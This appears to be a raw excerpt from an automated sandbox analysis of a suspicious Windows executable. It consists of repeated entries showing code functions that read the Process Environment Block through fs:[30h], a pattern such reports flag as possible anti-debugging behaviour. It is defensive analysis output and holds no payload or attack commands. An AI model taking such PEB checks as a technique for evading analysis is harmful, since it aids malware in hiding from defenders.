Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012AC427 mov eax, dword ptr fs:[00000030h]	4_2_012AC427
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01336420 mov eax, dword ptr fs:[00000030h]	4_2_01336420
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01336420 mov eax, dword ptr fs:[00000030h]	4_2_01336420
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01336420 mov eax, dword ptr fs:[00000030h]	4_2_01336420
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01336420 mov eax, dword ptr fs:[00000030h]	4_2_01336420
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01336420 mov eax, dword ptr fs:[00000030h]	4_2_01336420
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01336420 mov eax, dword ptr fs:[00000030h]	4_2_01336420
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01336420 mov eax, dword ptr fs:[00000030h]	4_2_01336420
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EA430 mov eax, dword ptr fs:[00000030h]	4_2_012EA430
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E8402 mov eax, dword ptr fs:[00000030h]	4_2_012E8402
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E8402 mov eax, dword ptr fs:[00000030h]	4_2_012E8402
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E8402 mov eax, dword ptr fs:[00000030h]	4_2_012E8402
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133C460 mov ecx, dword ptr fs:[00000030h]	4_2_0133C460
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DA470 mov eax, dword ptr fs:[00000030h]	4_2_012DA470
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DA470 mov eax, dword ptr fs:[00000030h]	4_2_012DA470
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DA470 mov eax, dword ptr fs:[00000030h]	4_2_012DA470
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0136A456 mov eax, dword ptr fs:[00000030h]	4_2_0136A456
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EE443 mov eax, dword ptr fs:[00000030h]	4_2_012EE443
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EE443 mov eax, dword ptr fs:[00000030h]	4_2_012EE443
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EE443 mov eax, dword ptr fs:[00000030h]	4_2_012EE443
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EE443 mov eax, dword ptr fs:[00000030h]	4_2_012EE443
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EE443 mov eax, dword ptr fs:[00000030h]	4_2_012EE443
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EE443 mov eax, dword ptr fs:[00000030h]	4_2_012EE443
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EE443 mov eax, dword ptr fs:[00000030h]	4_2_012EE443
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EE443 mov eax, dword ptr fs:[00000030h]	4_2_012EE443
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012A645D mov eax, dword ptr fs:[00000030h]	4_2_012A645D
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D245A mov eax, dword ptr fs:[00000030h]	4_2_012D245A
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B64AB mov eax, dword ptr fs:[00000030h]	4_2_012B64AB
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133A4B0 mov eax, dword ptr fs:[00000030h]	4_2_0133A4B0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E44B0 mov ecx, dword ptr fs:[00000030h]	4_2_012E44B0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0136A49A mov eax, dword ptr fs:[00000030h]	4_2_0136A49A
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B04E5 mov ecx, dword ptr fs:[00000030h]	4_2_012B04E5
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132C730 mov eax, dword ptr fs:[00000030h]	4_2_0132C730
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EC720 mov eax, dword ptr fs:[00000030h]	4_2_012EC720
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EC720 mov eax, dword ptr fs:[00000030h]	4_2_012EC720
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E273C mov eax, dword ptr fs:[00000030h]	4_2_012E273C
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E273C mov ecx, dword ptr fs:[00000030h]	4_2_012E273C
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E273C mov eax, dword ptr fs:[00000030h]	4_2_012E273C
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EC700 mov eax, dword ptr fs:[00000030h]	4_2_012EC700
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B0710 mov eax, dword ptr fs:[00000030h]	4_2_012B0710
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E0710 mov eax, dword ptr fs:[00000030h]	4_2_012E0710
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B8770 mov eax, dword ptr fs:[00000030h]	4_2_012B8770
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0770 mov eax, dword ptr fs:[00000030h]	4_2_012C0770
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0770 mov eax, dword ptr fs:[00000030h]	4_2_012C0770
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0770 mov eax, dword ptr fs:[00000030h]	4_2_012C0770
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0770 mov eax, dword ptr fs:[00000030h]	4_2_012C0770
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0770 mov eax, dword ptr fs:[00000030h]	4_2_012C0770
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0770 mov eax, dword ptr fs:[00000030h]	4_2_012C0770
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0770 mov eax, dword ptr fs:[00000030h]	4_2_012C0770
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0770 mov eax, dword ptr fs:[00000030h]	4_2_012C0770
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0770 mov eax, dword ptr fs:[00000030h]	4_2_012C0770
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0770 mov eax, dword ptr fs:[00000030h]	4_2_012C0770
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0770 mov eax, dword ptr fs:[00000030h]	4_2_012C0770
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0770 mov eax, dword ptr fs:[00000030h]	4_2_012C0770
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E674D mov esi, dword ptr fs:[00000030h]	4_2_012E674D
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E674D mov eax, dword ptr fs:[00000030h]	4_2_012E674D
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E674D mov eax, dword ptr fs:[00000030h]	4_2_012E674D
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01334755 mov eax, dword ptr fs:[00000030h]	4_2_01334755
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133E75D mov eax, dword ptr fs:[00000030h]	4_2_0133E75D
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B0750 mov eax, dword ptr fs:[00000030h]	4_2_012B0750
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2750 mov eax, dword ptr fs:[00000030h]	4_2_012F2750
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2750 mov eax, dword ptr fs:[00000030h]	4_2_012F2750
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B07AF mov eax, dword ptr fs:[00000030h]	4_2_012B07AF
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013647A0 mov eax, dword ptr fs:[00000030h]	4_2_013647A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135678E mov eax, dword ptr fs:[00000030h]	4_2_0135678E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D27ED mov eax, dword ptr fs:[00000030h]	4_2_012D27ED
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D27ED mov eax, dword ptr fs:[00000030h]	4_2_012D27ED
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D27ED mov eax, dword ptr fs:[00000030h]	4_2_012D27ED
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B47FB mov eax, dword ptr fs:[00000030h]	4_2_012B47FB
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B47FB mov eax, dword ptr fs:[00000030h]	4_2_012B47FB
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133E7E1 mov eax, dword ptr fs:[00000030h]	4_2_0133E7E1
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BC7C0 mov eax, dword ptr fs:[00000030h]	4_2_012BC7C0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013307C3 mov eax, dword ptr fs:[00000030h]	4_2_013307C3
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B262C mov eax, dword ptr fs:[00000030h]	4_2_012B262C
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012CE627 mov eax, dword ptr fs:[00000030h]	4_2_012CE627
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E6620 mov eax, dword ptr fs:[00000030h]	4_2_012E6620
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E8620 mov eax, dword ptr fs:[00000030h]	4_2_012E8620
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C260B mov eax, dword ptr fs:[00000030h]	4_2_012C260B
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C260B mov eax, dword ptr fs:[00000030h]	4_2_012C260B
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C260B mov eax, dword ptr fs:[00000030h]	4_2_012C260B
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C260B mov eax, dword ptr fs:[00000030h]	4_2_012C260B
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C260B mov eax, dword ptr fs:[00000030h]	4_2_012C260B
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C260B mov eax, dword ptr fs:[00000030h]	4_2_012C260B
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C260B mov eax, dword ptr fs:[00000030h]	4_2_012C260B
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2619 mov eax, dword ptr fs:[00000030h]	4_2_012F2619
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132E609 mov eax, dword ptr fs:[00000030h]	4_2_0132E609
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EA660 mov eax, dword ptr fs:[00000030h]	4_2_012EA660
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EA660 mov eax, dword ptr fs:[00000030h]	4_2_012EA660
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0137866E mov eax, dword ptr fs:[00000030h]	4_2_0137866E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0137866E mov eax, dword ptr fs:[00000030h]	4_2_0137866E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E2674 mov eax, dword ptr fs:[00000030h]	4_2_012E2674
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012CC640 mov eax, dword ptr fs:[00000030h]	4_2_012CC640
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EC6A6 mov eax, dword ptr fs:[00000030h]	4_2_012EC6A6
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E66B0 mov eax, dword ptr fs:[00000030h]	4_2_012E66B0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B4690 mov eax, dword ptr fs:[00000030h]	4_2_012B4690
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B4690 mov eax, dword ptr fs:[00000030h]	4_2_012B4690
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0132E6F2
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0132E6F2
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0132E6F2
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0132E6F2
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013306F1 mov eax, dword ptr fs:[00000030h]	4_2_013306F1
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013306F1 mov eax, dword ptr fs:[00000030h]	4_2_013306F1
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EA6C7 mov ebx, dword ptr fs:[00000030h]	4_2_012EA6C7
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EA6C7 mov eax, dword ptr fs:[00000030h]	4_2_012EA6C7
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133892A mov eax, dword ptr fs:[00000030h]	4_2_0133892A
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0134892B mov eax, dword ptr fs:[00000030h]	4_2_0134892B
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133C912 mov eax, dword ptr fs:[00000030h]	4_2_0133C912
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012A8918 mov eax, dword ptr fs:[00000030h]	4_2_012A8918
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012A8918 mov eax, dword ptr fs:[00000030h]	4_2_012A8918
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132E908 mov eax, dword ptr fs:[00000030h]	4_2_0132E908
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132E908 mov eax, dword ptr fs:[00000030h]	4_2_0132E908
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F096E mov eax, dword ptr fs:[00000030h]	4_2_012F096E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F096E mov edx, dword ptr fs:[00000030h]	4_2_012F096E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F096E mov eax, dword ptr fs:[00000030h]	4_2_012F096E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01354978 mov eax, dword ptr fs:[00000030h]	4_2_01354978
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01354978 mov eax, dword ptr fs:[00000030h]	4_2_01354978
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D6962 mov eax, dword ptr fs:[00000030h]	4_2_012D6962
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D6962 mov eax, dword ptr fs:[00000030h]	4_2_012D6962
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D6962 mov eax, dword ptr fs:[00000030h]	4_2_012D6962
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133C97C mov eax, dword ptr fs:[00000030h]	4_2_0133C97C
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01330946 mov eax, dword ptr fs:[00000030h]	4_2_01330946
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01384940 mov eax, dword ptr fs:[00000030h]	4_2_01384940
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013389B3 mov esi, dword ptr fs:[00000030h]	4_2_013389B3
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013389B3 mov eax, dword ptr fs:[00000030h]	4_2_013389B3
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013389B3 mov eax, dword ptr fs:[00000030h]	4_2_013389B3
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B09AD mov eax, dword ptr fs:[00000030h]	4_2_012B09AD
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B09AD mov eax, dword ptr fs:[00000030h]	4_2_012B09AD
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C29A0 mov eax, dword ptr fs:[00000030h]	4_2_012C29A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C29A0 mov eax, dword ptr fs:[00000030h]	4_2_012C29A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C29A0 mov eax, dword ptr fs:[00000030h]	4_2_012C29A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C29A0 mov eax, dword ptr fs:[00000030h]	4_2_012C29A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C29A0 mov eax, dword ptr fs:[00000030h]	4_2_012C29A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C29A0 mov eax, dword ptr fs:[00000030h]	4_2_012C29A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C29A0 mov eax, dword ptr fs:[00000030h]	4_2_012C29A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C29A0 mov eax, dword ptr fs:[00000030h]	4_2_012C29A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C29A0 mov eax, dword ptr fs:[00000030h]	4_2_012C29A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C29A0 mov eax, dword ptr fs:[00000030h]	4_2_012C29A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C29A0 mov eax, dword ptr fs:[00000030h]	4_2_012C29A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C29A0 mov eax, dword ptr fs:[00000030h]	4_2_012C29A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C29A0 mov eax, dword ptr fs:[00000030h]	4_2_012C29A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133E9E0 mov eax, dword ptr fs:[00000030h]	4_2_0133E9E0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E29F9 mov eax, dword ptr fs:[00000030h]	4_2_012E29F9
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E29F9 mov eax, dword ptr fs:[00000030h]	4_2_012E29F9
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0137A9D3 mov eax, dword ptr fs:[00000030h]	4_2_0137A9D3
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013469C0 mov eax, dword ptr fs:[00000030h]	4_2_013469C0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BA9D0 mov eax, dword ptr fs:[00000030h]	4_2_012BA9D0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BA9D0 mov eax, dword ptr fs:[00000030h]	4_2_012BA9D0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BA9D0 mov eax, dword ptr fs:[00000030h]	4_2_012BA9D0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BA9D0 mov eax, dword ptr fs:[00000030h]	4_2_012BA9D0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BA9D0 mov eax, dword ptr fs:[00000030h]	4_2_012BA9D0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BA9D0 mov eax, dword ptr fs:[00000030h]	4_2_012BA9D0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E49D0 mov eax, dword ptr fs:[00000030h]	4_2_012E49D0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135483A mov eax, dword ptr fs:[00000030h]	4_2_0135483A
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135483A mov eax, dword ptr fs:[00000030h]	4_2_0135483A
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D2835 mov eax, dword ptr fs:[00000030h]	4_2_012D2835
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D2835 mov eax, dword ptr fs:[00000030h]	4_2_012D2835
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D2835 mov eax, dword ptr fs:[00000030h]	4_2_012D2835
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D2835 mov ecx, dword ptr fs:[00000030h]	4_2_012D2835
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D2835 mov eax, dword ptr fs:[00000030h]	4_2_012D2835
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D2835 mov eax, dword ptr fs:[00000030h]	4_2_012D2835
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EA830 mov eax, dword ptr fs:[00000030h]	4_2_012EA830
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133C810 mov eax, dword ptr fs:[00000030h]	4_2_0133C810
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133E872 mov eax, dword ptr fs:[00000030h]	4_2_0133E872
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133E872 mov eax, dword ptr fs:[00000030h]	4_2_0133E872
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01346870 mov eax, dword ptr fs:[00000030h]	4_2_01346870
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01346870 mov eax, dword ptr fs:[00000030h]	4_2_01346870
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C2840 mov ecx, dword ptr fs:[00000030h]	4_2_012C2840
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B4859 mov eax, dword ptr fs:[00000030h]	4_2_012B4859
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B4859 mov eax, dword ptr fs:[00000030h]	4_2_012B4859
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E0854 mov eax, dword ptr fs:[00000030h]	4_2_012E0854
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B0887 mov eax, dword ptr fs:[00000030h]	4_2_012B0887
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133C89D mov eax, dword ptr fs:[00000030h]	4_2_0133C89D
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0137A8E4 mov eax, dword ptr fs:[00000030h]	4_2_0137A8E4
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EC8F9 mov eax, dword ptr fs:[00000030h]	4_2_012EC8F9
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EC8F9 mov eax, dword ptr fs:[00000030h]	4_2_012EC8F9
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DE8C0 mov eax, dword ptr fs:[00000030h]	4_2_012DE8C0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013808C0 mov eax, dword ptr fs:[00000030h]	4_2_013808C0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DEB20 mov eax, dword ptr fs:[00000030h]	4_2_012DEB20
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DEB20 mov eax, dword ptr fs:[00000030h]	4_2_012DEB20
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01378B28 mov eax, dword ptr fs:[00000030h]	4_2_01378B28
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01378B28 mov eax, dword ptr fs:[00000030h]	4_2_01378B28
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132EB1D mov eax, dword ptr fs:[00000030h]	4_2_0132EB1D
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132EB1D mov eax, dword ptr fs:[00000030h]	4_2_0132EB1D
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132EB1D mov eax, dword ptr fs:[00000030h]	4_2_0132EB1D
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132EB1D mov eax, dword ptr fs:[00000030h]	4_2_0132EB1D
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132EB1D mov eax, dword ptr fs:[00000030h]	4_2_0132EB1D
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132EB1D mov eax, dword ptr fs:[00000030h]	4_2_0132EB1D
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132EB1D mov eax, dword ptr fs:[00000030h]	4_2_0132EB1D
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132EB1D mov eax, dword ptr fs:[00000030h]	4_2_0132EB1D
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132EB1D mov eax, dword ptr fs:[00000030h]	4_2_0132EB1D
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01384B00 mov eax, dword ptr fs:[00000030h]	4_2_01384B00
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012ACB7E mov eax, dword ptr fs:[00000030h]	4_2_012ACB7E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135EB50 mov eax, dword ptr fs:[00000030h]	4_2_0135EB50
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01382B57 mov eax, dword ptr fs:[00000030h]	4_2_01382B57
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01382B57 mov eax, dword ptr fs:[00000030h]	4_2_01382B57
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01382B57 mov eax, dword ptr fs:[00000030h]	4_2_01382B57
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01382B57 mov eax, dword ptr fs:[00000030h]	4_2_01382B57
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01346B40 mov eax, dword ptr fs:[00000030h]	4_2_01346B40
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01346B40 mov eax, dword ptr fs:[00000030h]	4_2_01346B40
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0137AB40 mov eax, dword ptr fs:[00000030h]	4_2_0137AB40
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01358B42 mov eax, dword ptr fs:[00000030h]	4_2_01358B42
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012A8B50 mov eax, dword ptr fs:[00000030h]	4_2_012A8B50
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01364B4B mov eax, dword ptr fs:[00000030h]	4_2_01364B4B
